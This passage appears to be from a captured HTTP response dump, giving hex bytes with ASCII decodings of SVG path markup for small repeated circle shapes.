                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC771INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC787INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC803INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC819INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC835INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC851INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC867INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                                                                                                                          Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC883INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC899INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC915INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC931INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC947INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC963INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC979INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC995INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1011INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1027INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
